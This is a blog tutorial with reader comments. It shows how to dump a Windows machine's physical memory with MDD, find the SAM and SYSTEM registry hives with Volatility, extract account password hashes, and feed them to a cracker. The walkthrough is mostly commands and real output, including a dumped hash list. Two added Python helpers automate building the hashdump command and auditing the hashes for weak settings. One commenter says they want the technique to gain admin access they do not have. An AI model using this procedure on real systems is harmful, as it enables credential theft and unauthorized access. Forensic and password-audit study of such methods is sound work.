Dumping Physical Memory to extract SAM Hashes
Tools Needed:
MDD
pyCrypto
Volatility 1.3 Beta
Volatility Plugin from Moyix
ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by ManTech International. MDD is capable of copying the complete contents of physical memory on the following Microsoft operating systems: Windows 2000, Windows XP, Windows 2003 Server and Windows 2008 Server.
After downloading MDD from the ManTech site you need to run the program at the command line.
MDD Command Line Usage:
mdd -o OUTPUTFILENAME
Step by Step Example :
First of all, run MDD to dump the memory of the machine. The output file is an image of the physical memory; MDD does nothing else, it is only used to dump memory.
C:\Documents and Settings\Administrator\Desktop\MDD>mdd_1.3.exe -o dump.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> Dumping 511.48 MB of physical memory to file 'dump.dd'.
130938 map operations succeeded (1.00)
0 map operations failed
took 32 seconds to write
MD5 is: 78924418adaf67d22a6687dcc6ff4e23
C:\Documents and Settings\Administrator\Desktop\MDD>
Next, we need to analyze the memory image, dump.dd.
For this, we will be using Volatility (1.3_Beta), the Volatility plugin from Moyix, and a Windows hash/password finder (SamInside) to identify the passwords.
1. First of all, most of these scripts are written in Python, so you need to download and install a Python interpreter (Active Python).
2. Download Volatility (1.3_Beta) , extract it to a folder.
3. Download Volatility Plugin from Moyix, extract it, and copy its content into the Volatility folder, overwriting your existing forensics, memory_objects, and memory_plugins folders.
4. Download pyCrypto and install it.
5. Copy the dump.dd file (output file of MDD) into the Volatility folder.
6. Run hivescan from volatility to get the hive offsets. Execute the following:
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta> python volatility hivescan -f dump.dd
Offset (hex)
45147992 0x2b0e758
45393752 0x2b4a758
49832984 0x2f86418
56797016 0x362a758
58091352 0x3766758
64191328 0x3d37b60
145440776 0x8ab4008
146819936 0x8c04b60
147082080 0x8c44b60
197245792 0xbc1bb60
215368912 0xcd644d0
228964464 0xda5b870
244838408 0xe97f008
271077384 0x10285008
271171592 0x1029c008
361696096 0x158f0b60
373147760 0x163dc870
401433808 0x17ed64d0
425734152 0x19603008
435642376 0x19f76008
452021088 0x1af14b60
489651040 0x1d2f7b60
506391392 0x1e2eeb60
509397104 0x1e5cc870
526976208 0x1f6904d0
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>
7. Next, run hivelist from Volatility with the first hivescan offset from the previous output. Execute the following:
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>python volatility hivelist -f dump.dd -o 0x2b0e758
Address Name
0xe1cda008 \Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1cc4008 \Documents and Settings\Administrator\NTUSER.DAT
0xe1afeb60 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b4c008 \Documents and Settings\LocalService\NTUSER.DAT
0xe1b13870 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1b004d0 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1609b60 \WINDOWS\system32\config\software
0xe160bb60 \WINDOWS\system32\config\default
0xe1741b60 \WINDOWS\system32\config\SAM
0xe1607008 \WINDOWS\system32\config\SECURITY
0xe142e418 [no name]
0xe1036758 \WINDOWS\system32\config\system
0xe1022758 [no name]
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>
8. Now that we have the hive addresses, note the SAM and SYSTEM ones. Find the password hashes with the hashdump command, where -y takes the SYSTEM hive offset and -s takes the SAM hive offset: python volatility hashdump -f dump.dd -y <SYSTEM hive offset> -s <SAM hive offset>. For this image:
python volatility hashdump -f dump.dd -y 0xe1036758 -s 0xe1741b60
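Picking the two offsets out of the hivelist output by hand is error-prone, especially since the console wraps long hive paths onto a second line. The following Python is an added example (not part of the original post and not Volatility's own code): it parses hivelist output, re-joins wrapped path lines, locates the SYSTEM and SAM hives by their path suffix, and builds the hashdump command line. The sample input is the hivelist output shown above, embedded as a constructed string.

```python
import re

# Constructed sample input: the hivelist output from the walkthrough above,
# including one entry that the console wrapped onto a second line and the
# trailing command prompt.
SAMPLE_HIVELIST = r"""
Address Name
0xe1cda008 \Documents and Settings\Administrator\Local Settings\Application Da
ta\Microsoft\Windows\UsrClass.dat
0xe1cc4008 \Documents and Settings\Administrator\NTUSER.DAT
0xe1609b60 \WINDOWS\system32\config\software
0xe160bb60 \WINDOWS\system32\config\default
0xe1741b60 \WINDOWS\system32\config\SAM
0xe1607008 \WINDOWS\system32\config\SECURITY
0xe142e418 [no name]
0xe1036758 \WINDOWS\system32\config\system
0xe1022758 [no name]
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>
"""

# One hive entry: a hex address followed by the hive's path (or "[no name]").
HIVE_LINE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(.*)$")


def parse_hivelist(text):
    """Parse hivelist output into a list of (address, name) tuples.

    A line that does not start with an address is treated as the console
    continuation of the previous entry's path; the header line and the
    command prompt are skipped.
    """
    hives = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Address") or line.endswith(">"):
            continue
        m = HIVE_LINE.match(line)
        if m:
            hives.append((int(m.group(1), 16), m.group(2).strip()))
        elif hives:
            addr, name = hives[-1]
            hives[-1] = (addr, name + line)
    return hives


def find_hive(hives, suffix):
    """Return the address of the single hive whose path ends with `suffix`."""
    matches = [addr for addr, name in hives
               if name.lower().endswith(suffix.lower())]
    if len(matches) != 1:
        raise ValueError(
            f"expected exactly one hive ending in {suffix!r}, found {len(matches)}")
    return matches[0]


def hashdump_command(text, image="dump.dd"):
    """Build the hashdump command line: -y is the SYSTEM hive, -s the SAM hive."""
    hives = parse_hivelist(text)
    system_addr = find_hive(hives, r"\config\system")
    sam_addr = find_hive(hives, r"\config\SAM")
    return (f"python volatility hashdump -f {image} "
            f"-y {system_addr:#x} -s {sam_addr:#x}")


if __name__ == "__main__":
    print(hashdump_command(SAMPLE_HIVELIST))
```

find_hive insists on exactly one match so that a second user-profile hive with a similar name, or a truncated list, is reported instead of silently picking the wrong offset.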
Extracted SAM :
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e342f6782d705142f81cce8f13488846:5cc6a7ed5dce2e04e648b8b6c14c9eed:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:00fb5891d8488d816968e68a09a868b8:::
john:1003:972d6bbe1f00e65eaad3b435b51404ee:69bf94898385467264708f3cc51cf0a4:::
Now you can just open this as a pwdump file in SamInside and crack it!
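The hashdump output above is in pwdump format, and a good deal can be read from it before any cracking: an NT hash equal to the NT hash of the empty string means the account has a blank password, and any LM hash other than the empty-password LM hash means the machine still stores LM hashes (if the second half of the LM hash is the empty-half constant, the password is seven characters or fewer). The following Python is an added example, not part of the original post, SamInside or Volatility: it parses pwdump lines and reports those conditions per account. The sample input is the walkthrough's own five hashdump lines, embedded as a constructed string.

```python
# LM and NT hashes of the empty password (well-known constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_LM_HALF = EMPTY_LM[:16]          # LM hash of seven null bytes
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Finding labels returned by the audit.
BLANK_PASSWORD = "blank password (NT hash is the hash of the empty string)"
LM_HASH_STORED = "LM hash stored (NoLMHash not enforced)"
LM_SHORT_PASSWORD = "password is 7 characters or fewer (second LM half is empty)"

# Constructed sample input: the hashdump lines from the walkthrough above.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e342f6782d705142f81cce8f13488846:5cc6a7ed5dce2e04e648b8b6c14c9eed:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:00fb5891d8488d816968e68a09a868b8:::
john:1003:972d6bbe1f00e65eaad3b435b51404ee:69bf94898385467264708f3cc51cf0a4:::
"""


def parse_pwdump(text):
    """Parse pwdump-format lines (user:rid:lmhash:nthash:::) into dicts."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"malformed pwdump line: {line!r}")
        records.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return records


def audit_record(rec):
    """Return the list of findings for one parsed account record."""
    findings = []
    if rec["nt"] == EMPTY_NT:
        findings.append(BLANK_PASSWORD)
    if rec["lm"] != EMPTY_LM:
        findings.append(LM_HASH_STORED)
        # LM pads the password to 14 bytes and hashes each 7-byte half
        # separately, so an empty second half reveals a short password.
        if rec["lm"][16:] == EMPTY_LM_HALF:
            findings.append(LM_SHORT_PASSWORD)
    return findings


def audit_pwdump(text):
    """Map each account name to its findings (an empty list means nothing flagged)."""
    return {rec["user"]: audit_record(rec) for rec in parse_pwdump(text)}


if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE_PWDUMP).items():
        print(f"{user}: {'; '.join(findings) or 'no findings'}")
```

Run against the sample, the audit flags the blank Administrator and Guest passwords and shows that the host still stores LM hashes, which on its own is a finding worth fixing regardless of how strong the passwords turn out to be.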
Source: Warlock
on March 31st, 2009 at 5:40 am
It didn't work for an AD DC. However it did work for an XP system.
on May 23rd, 2009 at 10:25 pm
It didn’t work for AD because it uses kerberos authentication instead of NTLM
on September 21st, 2009 at 7:52 pm
Useless as it must be run as administrator – and that's the problem – we peed-ons don't have the access we need, and are trying to get admin access. If we had admin access we wouldn't need MDD to get it.
on August 9th, 2010 at 5:15 pm
I have Windows 7 Ultimate x64 and when I try to dump memory I get this:
C:\tools>mdd.exe -o dump.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> ERROR: Vista 64-bit and above require a signed driver file
-> ERROR: Unable to extract driver…
-> ERROR: Failed to open PhysicalMemory section!
What should I do to make it work?
on September 1st, 2010 at 11:53 am
>>What should I do to make it work?
It’s all right!!! Windows 7 has new secure rules!
on December 31st, 2010 at 9:11 pm
That problem is because you don't have the permission; run mdd as administrator.